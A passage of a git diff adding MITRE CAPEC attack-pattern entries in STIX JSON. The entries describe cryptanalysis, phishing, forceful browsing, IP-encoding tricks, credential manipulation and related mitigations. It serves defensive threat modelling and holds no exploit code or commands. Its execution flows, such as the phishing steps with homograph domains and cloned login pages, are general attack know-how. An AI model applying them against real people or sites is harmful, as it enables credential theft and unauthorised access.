can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \"E\" in an English language occurs with a certain known frequency (about 12.7%), whatever \"E\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext.

Exploit

  1. An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8" + ], + "x_capec_prerequisites": [ + "The target software utilizes some sort of cryptographic algorithm.", + "An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.", + "The encryption algorithm is known to the attacker.", + "An attacker has access to the ciphertext." + ], + "x_capec_resources_required": [ + "Computing resource requirements will vary based on the complexity of a given cryptanalysis technique. Access to the encryption/decryption routines of the algorithm is also required." + ], + "x_capec_skills_required": { + "High": "Cryptanalysis generally requires a very significant level of understanding of mathematics and computation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use proven cryptographic algorithms with recommended key sizes.", + "id": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abc4a679-2285-4f45-82cd-1109211ab070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--722bfc5b-c0b1-457d-aa1b-4918cf8f3974", + "target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Ensure that the algorithms are used properly. That means:\n \n 1. Not rolling out your own crypto; Use proven algorithms and implementations.\n 2. Choosing initialization vectors with sufficiently random numbers\n 3. Generating key material using good sources of randomness and avoiding known weak keys\n 4. Using proven protocols and their implementations.\n 5. Picking the most appropriate cryptographic algorithm for your usage context and data\n \n ", + "id": "course-of-action--bbfcad03-0664-4eee-863a-505d55ef851a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-97-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--487a11a7-57af-4eaa-b92b-3531374ad2d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbfcad03-0664-4eee-863a-505d55ef851a", + "target_ref": "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or \"fishing\" for information.", + "external_references": [ + { + "external_id": "CAPEC-98", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/98.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Phishing", + "external_id": "T1566", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566" + }, + { + "description": "Phishing for Information", + "external_id": "T1598", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598" + }, + { + "description": "Wireless Security - Bluejack a Victim, TutorialsPoint", + "external_id": "REF-656", + "source_name": "reference_from_CAPEC", + "url": "https://www.tutorialspoint.com/wireless_security/wireless_security_bluejack_a_victim.htm" + } + ], + "id": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An attacker has just collected the target's online banking information which can now be used by the attacker to log into the target's bank account and transfer money to a bank account of the attackers' choice.", + "An adversary may use BlueJacking, or Bluetooth Phishing to send unsolicited contact cards, messages, or pictures to nearby devices that are listening via Bluetooth. These messages may contain phishing content." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

    2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.

  2. Explore legitimate website and create duplicate: An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

    3. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to enter sensitive information on attacker's site.: An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

    2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.

  2. Use stolen credentials to log into legitimate site: Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

    3. Techniques
    Log in to the legitimate site using another user's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--614cd894-0aa6-4031-88e1-89bd7b6118bb", + "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0" + ], + "x_capec_prerequisites": [ + "An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail.", + "An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An attacker needs to have a sufficiently compelling call to action to prompt the user to take action.", + "The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Some web development tools to put up a fake website." + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c786816-7b0c-4fe7-b657-7e339aea5498", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8cee0cf-4567-40f0-a8d6-0b1d71c03c27", + "target_ref": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-99", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/99.html" + } + ], + "id": "attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Parser Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json new file mode 100644 index 0000000000000000000000000000000000000000..a1b32a9158fc469fc061d92906dced69bf4dc859 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json @@ -0,0 +1,88 @@ +{ + "id": "bundle--d8d07399-8d5e-4b47-8eee-186f1a87f968", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

    2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

    2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

    2. Techniques
    Access unprotected functions and execute them.

  2. View unauthorized data: The attacker discovers and views unprotected sensitive data.

    3. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json new file mode 100644 index 0000000000000000000000000000000000000000..7bd7df78ffb884bbb4599d53b90e752ddece2a16 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--c754bc79-6b19-4553-890f-2d5d2094c606", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-409", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html" + } + ], + "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json new file mode 100644 index 0000000000000000000000000000000000000000..293de2136a5f8da44b6eea70262add96f63d017e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json @@ -0,0 +1,45 @@ +{ + "id": "bundle--4cbb2cf4-62ad-4b39-a187-1a51eb3c49d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json new file mode 100644 index 0000000000000000000000000000000000000000..79e5c87a2f8edeccf6b02cc40d2ae0b61c1562ab --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json @@ -0,0 +1,77 @@ +{ + "id": "bundle--3b03ad83-4551-41c0-b6cf-00c2067245f0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

    2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json new file mode 100644 index 0000000000000000000000000000000000000000..263aba177e6ba296434db02a29c56da8ca3ab24a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--49e344c8-bee0-4a63-b79d-e302b8ed36ce", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.", + "external_references": [ + { + "external_id": "CAPEC-185", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + } + ], + "id": "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Download", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json new file mode 100644 index 0000000000000000000000000000000000000000..223f3d56c0750896f891bef403069785b163c08c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json @@ -0,0 +1,53 @@ +{ + "id": "bundle--7bd63075-1170-4cbb-8e3b-0bbc89944ea2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json new file mode 100644 index 0000000000000000000000000000000000000000..e56bb97b51d381d3dbc643171627cf270c2d8628 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--1af1c6ae-682c-4e2c-b5a3-346b6263fb1a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must 